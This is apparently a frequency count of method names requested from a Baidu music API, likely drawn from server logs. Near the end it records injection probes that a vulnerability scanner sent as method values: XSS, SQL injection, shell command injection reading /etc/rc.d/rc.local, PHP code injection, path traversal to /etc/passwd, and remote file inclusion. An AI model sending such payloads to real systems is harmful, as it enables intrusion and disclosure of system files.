baidu.ting.song.getInfos	70694066
baidu.ting.search.catalogSug	30994528
baidu.ting.song.baseInfo	29150805
baidu.ting.search.lrcpic	24930134
baidu.ting.user.listenAge	19893739
baidu.ting.song.play	19247936
baidu.ting.search.common	16908684
baidu.ting.song.down	10506059
baidu.ting.song.lry	8289415
baidu.ting.user.getUserBaseInfo	7621266
baidu.ting.song.getInfo	6290666
baidu.ting.artist.getSongList	6237785
baidu.ting.user.checkSuggestVersion	5786130
baidu.ting.search.getPhotoInfos	5777219
ting.baidu.diy.getPlaylists	5577281
baidu.ting.search.lrcys	5488805
baidu.ting.artist.getList	5465218
baidu.ting.billboard.billList	5058007
baidu.ting.favorite.isCollect	3851470
baidu.ting.game.gamedetail	3745704
baidu.ting.plaza.getRecommendAlbum	3392374
baidu.ting.user.checkComVersion	3255353
baidu.ting.diy.gedanInfo	3240468
baidu.ting.artist.getInfo	3031365
baidu.ting.plaza.active	2877392
baidu.ting.song.playAAC	2708734
baidu.ting.user.config	2618091
baidu.ting.active.start	2611913
baidu.ting.radio.playAction	2498801
baidu.ting.diy.getNowOfficalList	2407262
baidu.ting.plaza.getFocusPic	2209561
baidu.ting.diy.gedanHot	1794331
baidu.ting.search.suggestion	1690958
baidu.ting.artist.getinfo	1592184
baidu.ting.album.getAlbumInfo	1501799
baidu.ting.favorite.getCollectSong	1402116
baidu.ting.diy.category	1388675
ting.baidu.plaza.recdaily	1368551
baidu.ting.radio.getChannelSong	1294760
baidu.ting.diy.getSongFromOfficalList	1291693
baidu.ting.diy.addListenCount	1169014
baidu.ting.plaza.getPartDesc	1050107
baidu.ting.plaza.recdaily	1046064
baidu.ting.artist.getAlbumList	1008480
baidu.ting.diy.gedan	782845
baidu.ting.user.RegistToImsg	750026
baidu.ting.song.audio	740265
baidu.ting.tag.getHotTag	733031
baidu.ting.tag.songlist	731331
baidu.ting.user.down	613034
	601681
baidu.ting.feedback.song	493690
baidu.ting.radio.getCategoryList	487900
baidu.ting.search.lrcyss	430328
baidu.ting.search.getPhotoInfo	428245
baidu.ting.billboard.billCategory	391562
baidu.ting.artist.get72HotArtist	368959
baidu.ting.diy.getPlaylists	298756
baidu.ting.favorite.getFavoriteSong	238400
baidu.ting.video.getList	211358
baidu.ting.plaza.recommend	196608
baidu.ting.song.buffer	187793
baidu.ting.game.gamelist	175025
baidu.ting.favorite.addSongFavorites	162020
baidu.ting.song.getMulInfos	154280
baidu.ting.diy.search	123218
baidu.ting.tag.getAllTag	117547
baidu.ting.favorite.addSongFavorite	110748
baidu.ting.diy.getOfficialDiyList	106762
baidu.ting.diy.getSimilarGedan	102488
baidu.ting.video.play	88271
baidu.ting.user.checkVersion	63542
baidu.ting.artist.getSpecialSongList	63430
baidu.ting.favorite.delCollectSong	53230
baidu.ting.plaza.getNewSongs	51372
baidu.ting.user.nplogin	47373
ting.baidu.diy.getPlaylist	38323
baidu.ting.radio.getArtistChannelSong	35000
baidu.ting.plaza.getArtistPlaza	29112
baidu.ting.radio.getFavoriteSong	27225
baidu.ting.diy.getPlaylist	22297
baidu.ting.radio.serv	17812
baidu.ting.feedback.crash	15824
baidu.ting.artist.getHighSongTitle	15483
baidu.ting.diy.saveList	14359
ting.baidu.film.getFilmInfo	13992
baidu.ting.favorite.delSongFavorite	12472
baidu.ting.album.getList	12316
baidu.ting.song.cloud	10437
baidu.ting.artist.getQianQianArtist	8882
baidu.ting.song.getMulInfo	7401
ting.baidu.song.lry	6787
baidu.ting.video.category	6643
baidu.ting.diy.delListSong	6413
baidu.ting.diy.addListSong	6062
ting.baidu.artistapp.renum	5476
baidu.ting.user.logout	5396
baidu.ting.diy.delList	5366
baidu.ting.mv.getIndexMV	5289
baidu.ting.user.regPassport	5110
baidu.ting.billboard.catalog	4669
baidu.ting.weixin.response	4162
baidu.ting.mv.playMV	4026
baidu.ting.artist.getHighSongList	3625
baidu.ting.colorRing.listen	3390
baidu.ting.user.getMobileVcode	3144
baidu.ting.user.registToUC	3034
baidu.ting.favorite.delSongFavorites	2673
baidu.ting.colorRing.authset	2568
baidu.ting.colorRing.getCode	2494
baidu.ting.favorite.getFavoriteAlbum	1945
baidu.ting.artist.getSongVote	1677
baidu.ting.feedback.info	1525
baidu.ting.mv.searchMV	1507
baidu.ting.diy.getRecommendSpeical	1440
baidu.ting.artist.getSongRank	1386
baidu.ting.artist.getSong	1386
ting.baidu.artistapp.brief	1274
baidu.ting.diy.upList	1270
baidu.ting.favorite.getListenHistory	1234
baidu.ting.user.getMessage	927
baidu.ting.diy.addList	920
baidu.ting.favorite.getOffenListenList	772
baidu.ting.video.recMv	577
baidu.ting.song.getSuoSongInfo	486
baidu.ting.colorRing.subscribe	373
baidu.ting.user.activate	373
baidu.ting.colorRing.toneselect	346
baidu.ting.artist.getInfoByName	330
baidu.ting.artistapp.photo	274
baidu.ting.song.getHash	248
baidu.ting.favorite.getInfoFromView	235
ting.baidu.artistapp.newList	225
baidu.ting.favorite.addAlbumFavorite	215
baidu.ting.user.login	177
ting.baidu.artistapp.news	176
baidu.ting.mv.getMultiSongMVInfo	175
baidu.ting.favorite.delAlbumFavorite	154
baidu.ting.plaza.getMisNewSong	128
baidu.ting.mv.getMVCategory	102
baidu.ting.user.addPassportInfo	73
ting.baidu.artistapp.briefs	59
baidu.ting.game.catalog	55
 /v8  ADw-script AD4-sslx=812812 ADw-/script AD4- nonxss	43
baidu.ting.album.getAlbumstyle	20
ting.baidu.artistapp.send	14
baidu.ting.game.gameplay	12
\' (	12
(	12
baidu.ting.search.catalogsug	7
baidu.ting.song.getinfos	7
baidu.ting.song.playabcdc>>>>>\'\'\'\'\'\"\"\"\"\";;;	6
baidu.ting.song.lryabcdc>>>>>\'\'\'\'\'\"\"\"\"\";;;	6
../../../../../../../../../../sbin/../etc/./rc.d/../rc.d/.././rc.local	4
\'];${@print(md5(812812))};//	4
http://cirt.lnet/rfiinc.txt_	4
1\';cat /etc/rc.d/rc.local;\'	4
file:///etc/passwd_	4
/usr/bin/id;	4
../../../../../../../../../../etc/rc.d/rc.local_	4
data://text/plain;base64,W0hlbGxvIEFpc2h5XQ==_	4
data://text/plain;base64,W0hlbGxvIEFpc2h5XQ==	4
../../../../../../../../../../etc/passwd_	4
../../../../../../../../../../etc/passwd	4
set	4
http://cirt.lnet/rfiinc.txt	4
c:/windows/win.ini_	4
c:/windows/win.ini	4
file:///etc/passwd	4
file:///etc/rc.d/rc.local_	4
baidu.ting.song.play\';alert(1);\'	4
${@print(md5(812812))}	4
baidu.ting.song.lry\';alert(1);\'	4
1\\\";cat /etc/rc.d/rc.local;\\\"	4
../../../../../../../../../../etc/rc.d/rc.local	4
baidu.ting.outerPassport.profile	4
baidu.ting.search.getphotoinfos	4
file:///etc/rc.d/rc.local	4
string:{var_dump(md5(812812))}	4
1;cat /etc/rc.d/rc.local;	4
../../../../../../../../../../sbin/../etc/./rc.d/../rc.d/.././rc.local_	4
%{	4
${	4
file:///etc/passwd_.jpg	3
baidu.ting.song.play\'>\"></title></textarea></script><img src=a onerror=alert(1)>	2
baidu.ting.song.lry\'>\"></title></textarea></script><img src=a onerror=alert(1)>	2
baidu.ting.song.play<scrip<script>t>window.a==1?1:alert(1)</scrip</script>t>	2
baidu.ting.song.lry<scrip<script>t>window.a==1?1:alert(1)</scrip</script>t>	2
baidu.ting.song.play\'>\\\';</script>>\\\"><script>alert(1)</script>\'	2
baidu.ting.song.lry</textarea></title><script>alert(1)</script>	2
baidu.ting.song.lry\'>\\\';</script>>\\\"><script>alert(1)</script>\'	2
baidu.ting.song.play</textarea></title><script>alert(1)</script>	2
baidu.ting.song.play--></script><script>alert(1)</script>	2
baidu.ting.song.lry--></script><script>alert(1)</script>	2
baidu.ting.song.play>\'>\"><script>alert(1)</script>	2
baidu.ting.song.lry>\'>\"><script>alert(1)</script>	2
baidu.ting.song.play\"><img src=1 onerror=alert(1)>	2
data://text/plain;base64,W0hlbGxvIEFpc2h5XQ==_.jpg	2
baidu.ting.song.play%\' and 8281=8281 and \'%\'=\'	2
baidu.ting.song.lry\"><img src=1 onerror=alert(1)>	2
baidu.ting.song.lry%\' and 8281=8281 and \'%\'=\'	2
baidu.ting.song.play</script><script>alert(1);//	2
baidu.ting.song.play<script>confirm(1)</script>	2
baidu.ting.song.lry</script><script>alert(1);//	2
baidu.ting.song.play\') and 8288=8288 and (\'	2
baidu.ting.song.play\'/**/<scr/**/ipt>/**/>	2
../../../../../../../../../../etc/passwd_.jpg	2
baidu.ting.song.lry\') and 8288=8288 and (\'	2
baidu.ting.song.play(\')\'))(\")\'\"\"\"\")	2
baidu.ting.song.play\'\";alert(1);//	2
baidu.ting.song.play\' and \'8281\'=\'8281	2
baidu.ting.song.lry(\')\'))(\")\'\"\"\"\")	2
baidu.ting.song.lry\' and \'8281\'=\'8281	2
baidu.ting.song.lry<script>confirm(1)</script>	2
baidu.ting.song.playjavascript:alert(1)	2
baidu.ting.song.lryjavascript:alert(1)	2
baidu.ting.song.lry\'\";alert(1);//	2
baidu.ting.song.play\";alert(1);\"	2
../../../../../../../../../../sbin/../etc/./rc.d/../rc.d/.././rc.local_.jpeg	2
http://cirt.lnet/rfiinc.txt_.html	2
http://10.42.7.217/?1384641542.18	2
http://10.42.7.217/?1384641537.69	2
http://10.42.7.217/?1384623239.31	2
http://10.42.7.217/?1384623116.01	2
baidu.ting.song.lry\";alert(1);\"	2
http://cirt.lnet/rfiinc.txt_.htm	2
baidu.ting.song.play;alert(1);//	2
baidu.ting.song.lry;alert(1);//	2
file:///etc/rc.d/rc.local_.php	2
baidu.ting.song.play\"\'><body id=ssltest title=alert(1) onload=eval(ssltest.title)>	2
baidu.ting.song.lry\"\'><body id=ssltest title=alert(1) onload=eval(ssltest.title)>	2
../../../../../../../../../../sbin/../etc/./rc.d/../rc.d/.././rc.local_.html	1
../../../../../../../../../../sbin/../etc/./rc.d/../rc.d/.././rc.local_.jpg	1
baison	1
../../../../../../../../../../etc/rc.d/rc.local_.jpeg	1
../../../../../../../../../../etc/rc.d/rc.local_.html	1
../../../../../../../../../../etc/rc.d/rc.local_.jpg	1
baidu.ting.user.registtoimsg	1
../../../../../../../../../../etc/rc.d/rc.local_.htm	1
data://text/plain;base64,W0hlbGxvIEFpc2h5XQ==_.html	1
data://text/plain;base64,W0hlbGxvIEFpc2h5XQ==_.php	1
baidu.ting.plaza.getfocuspic	1
baidu.ting.se!rch.lrcpic	1
../../../../../../../../../../etc/passwd_.html	1
baidu.ting.song.getInf	1
file:///etc/passwd_.htm	1
baidu.ting.plaza.getrecommendalbum	1
c:/windows/win.ini_.php	1
c:/windows/win.ini_.jpg	1
baidu.ting.artist.get72hotartist	1
file:///etc/rc.d/rc.local_.jpeg	1
file:///etc/rc.d/rc.local_.jpg	1
c:/windows/win.ini_.jpeg	1
baidu.ting.tag.gethottag	1
c:/windows/win.ini_.htm	1
baidu.ting.push.send	1
